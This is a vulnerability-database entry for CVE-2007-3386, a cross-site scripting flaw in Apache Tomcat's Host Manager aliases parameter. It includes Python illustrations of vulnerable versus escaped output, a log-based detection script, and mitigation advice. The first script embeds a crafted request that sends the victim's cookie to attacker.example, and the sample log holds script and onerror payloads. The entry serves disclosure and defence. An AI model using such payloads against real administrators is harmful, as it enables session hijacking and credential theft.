CVE-2007-3386
Description
Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Cross-site scripting (XSS) vulnerability in Apache Tomcat Host Manager Servlet allows arbitrary HTML/script injection via crafted requests to the aliases parameter.
Vulnerability
The Host Manager Servlet in Apache Tomcat versions 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 contains a cross-site scripting (XSS) vulnerability. The HTML Host Manager echoes request parameters back into its response without HTML-encoding them, so a value supplied in the aliases parameter of an html/add request (the form action that adds a virtual host) is rendered as markup rather than as text, letting an attacker inject arbitrary HTML or script [1][3].
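The following Python model, added here as an illustration and not taken from Tomcat's source, shows the difference between echoing the aliases value verbatim and HTML-encoding it first. The request path and parameter names follow the CVE description; the exact markup Tomcat emitted, the hostname evil.example and the payload are assumptions. A small HTML parser stands in for the browser to confirm whether the echoed value becomes a script element.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed request: the URL a victim's browser would fetch after following a
# crafted link. Path and parameter names follow the CVE description; the
# payload is a stand-in (it would send the victim's cookie to the attacker).
CRAFTED_REQUEST = (
    "/host-manager/html/add?name=evil.example"
    "&aliases=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example"
    "%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E"
)


def parse_add_request(request_uri):
    """Return (name, aliases) decoded from the add action's query string."""
    qs = parse_qs(urlsplit(request_uri).query, keep_blank_values=True)
    return qs.get("name", [""])[0], qs.get("aliases", [""])[0]


def render_vulnerable(request_uri):
    """Model of the pre-fix behaviour: the submitted host name and aliases are
    echoed into the HTML page verbatim. Illustrative markup, not Tomcat's own."""
    name, aliases = parse_add_request(request_uri)
    return f"<tr><td>{name}</td><td>{aliases}</td></tr>"


def render_fixed(request_uri):
    """Same page with HTML output encoding applied to every echoed value.
    html.escape(quote=True) covers <, >, &, double and single quotes, which is
    enough for a value placed in element content or a quoted attribute."""
    name, aliases = parse_add_request(request_uri)
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(name, quote=True), html.escape(aliases, quote=True)
    )


class _TagCollector(HTMLParser):
    """Records start tags, i.e. what a browser would treat as markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def script_element_count(markup):
    """Number of <script> elements a browser-like parser finds in the page."""
    collector = _TagCollector()
    collector.feed(markup)
    return collector.tags.count("script")


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(CRAFTED_REQUEST))
    print("fixed:     ", render_fixed(CRAFTED_REQUEST))
```

The check parses the rendered page instead of looking for the literal payload string, because that is the question that matters: does the browser see a script element, or only text. Encoding at the point of output is the fix pattern; validating aliases as a list of host names on input is a worthwhile extra layer but not a substitute.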
Exploitation
The attacker does not need Host Manager credentials. The crafted request is delivered through the browser of a user who is already authenticated to the Host Manager, typically an administrator, by luring them to a link or a page that issues it; the browser attaches the victim's session cookie or HTTP Basic credentials, so the request is accepted and the injected script runs with that user's access [3]. Without an authenticated victim the request is simply rejected at the login prompt and nothing is rendered.
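A post-hoc check for this pattern in Tomcat access logs, added here as an example and not part of the original entry or of Tomcat: the name and aliases fields of an html/add request should only ever hold DNS names, so any decoded value containing other characters is worth a look. The log lines are constructed in the AccessLogValve "common" pattern; the addresses, user and timestamps are invented. The check only sees what the access log records, which is the request line, so a payload submitted in a POST body would not appear here.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Tomcat AccessLogValve "common" pattern
# (%h %l %u %t "%r" %s %b). Only the second and fifth carry a payload.
SAMPLE_LOG = """\
10.0.0.5 - admin [15/Aug/2007:10:12:01 +0000] "GET /host-manager/html/list HTTP/1.1" 200 4521
10.0.0.7 - admin [15/Aug/2007:10:13:44 +0000] "GET /host-manager/html/add?name=evil.example&aliases=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 1203
10.0.0.9 - - [15/Aug/2007:10:14:02 +0000] "GET /manager/html HTTP/1.1" 401 1293
10.0.0.7 - admin [15/Aug/2007:10:15:10 +0000] "GET /host-manager/html/add?name=www.example.org&aliases=example.org,example.net HTTP/1.1" 200 1180
10.0.0.7 - admin [15/Aug/2007:10:16:30 +0000] "GET /host-manager/html/add?name=x&aliases=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 1203
"""

CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Fields that should only ever hold DNS names: letters, digits, '.', '-' and
# ',' as the alias separator. Anything else is not a host name and, on an
# unpatched Host Manager, would be reflected into the page as markup.
HOSTNAME_FIELDS = ("name", "aliases")
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.,-]*$")


def parse_clf(line):
    """Split one common-format access log line into its fields, or None."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def suspicious_host_manager_requests(log_text):
    """Return one finding per host-manager request whose name/aliases value is
    not a plausible host name. Values are URL-decoded before the check so
    encoded payloads (%3C, %22, ...) are caught."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        parts = urlsplit(rec["uri"])
        if not parts.path.startswith("/host-manager/"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for field in HOSTNAME_FIELDS:
            for value in params.get(field, []):
                if not HOSTNAME_RE.match(value):
                    findings.append({
                        "host": rec["host"], "user": rec["user"],
                        "time": rec["time"], "param": field, "value": value,
                    })
    return findings


if __name__ == "__main__":
    for f in suspicious_host_manager_requests(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} user={f['user']} {f['param']}={f['value']!r}")
```

Matching on "what a host name may contain" rather than on a list of script fragments keeps the rule short and catches encodings and tag variants the author did not think of; the cost is an occasional false positive on a typo in a legitimate alias, which an analyst can dismiss quickly. Because the Host Manager requires authentication, the logged user tells you whose session the request rode on.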
Impact
Successful exploitation allows the attacker to execute arbitrary HTML and JavaScript in the victim's browser within the security context of the Host Manager application. This can lead to session hijacking, defacement, theft of sensitive information such as administrative credentials, or Host Manager actions (adding or removing virtual hosts) issued from the victim's browser on the attacker's behalf [3].
Mitigation
Upgrade to a fixed release: 6.0.14 or later on the 6.0.x branch and 5.5.25 or later on the 5.5.x branch [3]; distribution vendors shipped backported fixes as well (see the Red Hat and Debian advisories among the references). Where an immediate upgrade is not possible, reduce exposure: remove the host-manager web application if it is not needed, restrict access to it by source address, and have administrators log out of the Host Manager after each use and close the browser session, so that no authenticated session is available for an injected script to ride on.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:a:apache:tomcat:5.5.0:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.1:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.10:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.11:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.12:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.13:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.14:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.15:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.16:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.17:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.18:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.19:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.2:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.20:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.21:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.22:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.23:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.24:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.3:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.4:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.5:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.6:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.7:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.8:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.9:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.10:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.11:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.12:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.13:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.4:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.6:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.8:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.9:*:*:*:*:*:*:*
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- tomcat.apache.org/security-6.html (vendor advisory, patch)
- community.ca.com/blogs/casecurityresponseblog/archive/2009/01/23.aspx
- h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp
- jvn.jp/jp/JVN%2359851336/index.html
- lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html
- osvdb.org/36417
- secunia.com/advisories/26465
- secunia.com/advisories/26898
- secunia.com/advisories/27037
- secunia.com/advisories/27267
- secunia.com/advisories/27727
- secunia.com/advisories/28317
- secunia.com/advisories/33668
- securityreason.com/securityalert/3010
- securitytracker.com/id
- support.ca.com/irj/portal/anonymous/phpsupcontent
- www.debian.org/security/2008/dsa-1447
- www.mandriva.com/security/advisories
- www.redhat.com/support/errata/RHSA-2007-0871.html
- www.securityfocus.com/archive/1/476448/100/0/threaded
- www.securityfocus.com/archive/1/500396/100/0/threaded
- www.securityfocus.com/archive/1/500412/100/0/threaded
- www.securityfocus.com/bid/25314
- www.vupen.com/english/advisories/2007/2880
- www.vupen.com/english/advisories/2007/3386
- www.vupen.com/english/advisories/2007/3527
- www.vupen.com/english/advisories/2009/0233
- exchange.xforce.ibmcloud.com/vulnerabilities/36001
- oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10077
- www.redhat.com/archives/fedora-package-announce/2007-November/msg00525.html
News mentions
No linked articles in our index yet.